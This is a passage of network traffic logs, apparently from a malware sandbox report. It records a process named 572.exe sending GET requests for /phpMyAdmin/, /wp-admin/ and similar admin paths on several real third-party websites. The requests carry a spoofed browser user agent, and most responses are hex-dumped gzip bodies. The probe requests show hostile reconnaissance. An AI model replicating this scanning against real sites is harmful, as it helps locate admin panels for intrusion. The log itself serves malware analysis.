                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.217533112 CET183INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f cd 0a 83 30 10 84 ef 3e 45 48 ef a6 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 62 30 82 f9 41 63 c1 b7 6f 4c 7b ec 5c 96 9d 1d 86 6f 71 cd da 86 24 b8 a6 79 19 06 7b b0 86 92 d6 be e5 00 98 d4 ce 2e 7c 99 e6 1d a3 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0>EHkA$b0AcoL{\oq$y{.|!,k>*F,(x^7aJMK+1sPWv3~MGkYj;d$J.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                287192.168.2.656882162.241.203.3080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.112870932 CET175OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.230410099 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                288192.168.2.656887104.18.32.10980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.119800091 CET181OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.259934902 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=HTdhiFEHQ5RGQCcLrcRtNpgnvzRyndeZpTAuCOlwX6w-1707131693-1-AbCaMLIjDqngVMcGLilAlUXwWsRi7mqIuPYzF0jb7+CWUPLUIhQswNu9gDr78WVmD54g64fXmrtQsks4sMe1hg8=; path=/; expires=Mon, 05-Feb-24 11:44:53 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7a5cd51d6a-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f db 38 12 fe ee 5f 31 d5 2d 22 1b b0 64 a7 db 6c 73 b1 e4 43 37 cd e2 02 34 db de 36 c5 5e 51 14 06 45 8e 2d 26 14 a9 23 69 3b de d4 ff fd 40 51 b2 e5 97 64 b7 b8 03 02 c4 24 87 0f 67 9e 79 21 47 c9 8b b7 ef 2f 6f 3f 7f b8 82 dc 16 62 dc 49 5e 44 d1 17 3e 05 61 e1 fa 0a 5e 7f 1d 43 e2 16 80 0a 62 4c 1a 48 15 dd 19 e0 f8 13 28 c1 38 06 20 88 9c a5 01 ca e8 d3 c7 60 0c c9 8b 2f 28 19 9f 7e 8d a2 2d 54 8d 03 70 1c ea f5 f7 41 9d 3f 03 75 fe 1d 50 33 5b a3 b9 89 63 56 1e a2 44 d1 2e 52 8e 84 8d 3b 89 e5 56 e0 f8 8d b5 28 2d 57 12 7e c3 ff cc b9 46 f6 02 be c1 a5 50 73 36 15 44 63 32 f0 72 9d a4 40 4b 80 e6 44 1b b4 69 f0 e9 f6 97 e8 3c 80 41 b3 90 5b 5b 46 0e 61 91 06 97 4a 3a d0 e8 76 55 62 00 d4 8f d2 c0 e2 83 1d 38 7d 47 1b 98 e7 50 fe 1d 7d 7a 13 5d aa a2 24 96 67 a2 0d 74 7d 95 5e b1 19 b6 f6 49 52 60 1a 68 95 29 6b 5a 82 52 71 c9 f0 a1 0f 52 4d 95 10 6a 79 b0 65 c1 71 59 2a 6d 5b 9b 96 9c d9 3c 65 b8 e0 14 a3 6a d0 e7 92 5b 4e 44 64 28 11 98 9e 7a 14 c1 e5 3d 68 14 69 60 ec 4a a0 c9 11 6d 00 9c a5 01 9d 4e fc 54 44 8d 09 20 d7 38 4d 83 01 65 32 a2 33 3e f0 4b 03 3a 8d 51 6b a5 4d 5c 09 0d f6 63 f8 ef 5f c7 4f 1f 11 6e 8f e0 e8 4e 09 ff f4 14 8e cd 41 bb d1 50 09 8e 33 c5 56 8f 05 d1 33 2e 2f 86 a3 92 30 c6 e5 ec 62 b8 4e 3c d0 b8 d3 69 45 20 3a fd 4e 87 75 0c 76 12 43 35 2f ed b8 03 c0 a7 d0 7d 21 c9 82 cf 88 55 3a a6 4a dd 73 bc 92 24 13 c8 7a f0 d8 71 29 b0 e4 92 a9 65 4c 18 bb 5a a0 b4 ef b8 b1 28 51 77 c3 b7 ef 6f ea c8 79 a7 08 43 16 f6 61 3a 97 b4 0a ce 6e b3 1b 60 41 34 d4 c0 02 52 60 8a ce 0b 94 36 9e a1 bd 12 e8 7e fe bc ba 66 dd d0 cb 44 44 a0 b6 61 6f 54 ef 6e 76 c6 95 5d 31 e3 a6 14 64 05 29 84 99 50 f4 3e f4 72 eb 5e 07 60 dd 49 06 8d 69 07 59 d4 e9 24 83 3a 91 1c 77 ce f8 84 f1 45 ed ff 68 a9 49 59 a2 0e c6 15 5c b5 52 27 29 9d 7a 95 a0 f9 11 55 0e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 86dXmo8_1-"dlsC746^QE-&#i;@Qd$gy!G/o?bI^D>a^CbLH(8 `/(~-TpA?uP3[cVD.R;V(-W~FPs6Dc2r@KDi<A[[FaJ:vUb8}GP}z]$gt}^IR`h)kZRqRMjyeqY*m[<ej[NDd(z=hi`JmNTD 8Me23>K:QkM\c_OnNAP3V3./0bN<iE :NuvC5/}!U:Js$zq)eLZ(QwoyCa:n`A4R`6~fDDaoTnv]1d)P>r^`IiY$:wEhIY\R')zU
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.259948015 CET1286INData Raw: 72 c3 5a e3 6a 5c 47 52 cb 86 00 18 b1 24 b2 9a 48 23 88 45 97 e2 8e d8 89 17 32 c1 f8 83 40 62 10 fc 74 6d a9 89 93 01 e3 8b 96 1e b5 86 d5 29 11 43 4b b8 70 39 b3 d1 6e 67 61 cf 90 03 53 ea 65 a7 bd 63 c3 ff f2 08 6a 81 da a5 d7 66 ab ab 7e a7
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: rZj\GR$H#E2@btm)CKp9ngaSecjf~FTOf%JUVj9Y d*!d ?mlib$1%G=_VMhL0@4_$02GL]AL.,`Wqq&>M|>mF&W6rpoOB@<K[PZ)Vtw
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.259957075 CET261INData Raw: 38 47 d7 1e 40 0a a7 7e 5c 7d 83 d8 0e 7d e3 5a 2a c3 6b 67 84 24 ab de 71 18 b6 05 ac 2a 21 85 61 7b aa ba 24 f7 e6 fc a5 e8 50 a4 92 bb 08 0b 6e 78 c6 85 2b 51 29 84 3e d4 c3 6d 5c bb b6 77 d7 e0 e1 43 de 1b 6d 4a 43 4e 24 13 a8 5d e7 5e 53 c0
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 8G@~\}}Z*kg$q*!a{$Pnx+Q)>m\wCmJCN$]^S!o-ok(mgwvTr_-GO~ps)QpgF7Z5hExE\{x6;zd8)`WTRR8hN;_Q0R<CXZ5.
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.259965897 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                289192.168.2.656922162.241.203.3080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.200486898 CET218OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://nossoplayer.me/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.316627026 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                290192.168.2.656959172.203.148.3480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.293015003 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: eei.uniandes.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.407543898 CET155INHTTP/1.1 302 Found : Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://eei.uniandes.edu.co/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                291192.168.2.657082104.22.74.22080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.478920937 CET174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.607687950 CET345INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7c9d726755-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                292192.168.2.65710135.186.223.18080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.506623030 CET182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sigapbanjarmasin.info
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.363684893 CET469INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Google Frontend
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 90 b1 6e c4 30 08 86 f7 4a f7 0e 34 d3 75 88 7d 3a 2b 5b 72 5b f7 be 02 b1 b9 c4 92 63 22 ec 8b 94 b7 2f 89 74 43 cb 82 80 1f f8 a0 9f eb 92 1e 97 8f 7e 26 0c 87 5f a8 22 64 5c 68 68 84 47 ae a5 01 cf b9 52 ae 43 93 19 c5 cf 71 a3 06 ec 3f ed c4 3c 25 52 fd 1f 79 c9 71 5d 49 73 a7 dc be 77 8c 1c f6 a3 3f c4 0d 30 c5 29 0f 5e e7 93 9c 1c ee f1 2d c2 62 e0 07 27 02 8f 39 73 85 91 20 c4 b2 26 dc 29 68 25 11 16 ad 29 17 fa 0a 3b bf 04 0a c9 16 3d c1 2a bc c5 40 02 4f 16 58 58 b4 51 2f 8a a9 18 80 ab 73 5f bd 9d 9d ee 01 b5 fe b3 6d 5b 70 9d b9 df 9c b9 77 9d 71 1a 1f 0c 56 c1 4e ff 06 b5 e7 97 7e 01 00 00 ff ff 03 00 95 4c 54 84 2c 01 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e2\n0J4u}:+[r[c"/tC~&_"d\hhGRCq?<%Ryq]Isw?0)^-b'9s &)h%);=*@OXXQ/s_m[pwqVN~LT,
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.363837004 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                293192.168.2.657100104.18.32.10980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.517122984 CET181OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.651927948 CET613INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://sport.autoplay.cloud/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=Bhkq0x3V4Z4A7t74Lt1f47WvH_uHe9Iv8LFTy1lQ0A8-1707131693-1-AQmaB/vIJkdO2BnPwTI5MCS2HkXhr/kAd+lKIk+xUu4S/r7Mxb8rP904d91urFPRe8LWbvlIaQQhIXZR+2XgYVY=; path=/; expires=Mon, 05-Feb-24 11:44:53 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7ccbda7bc9-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
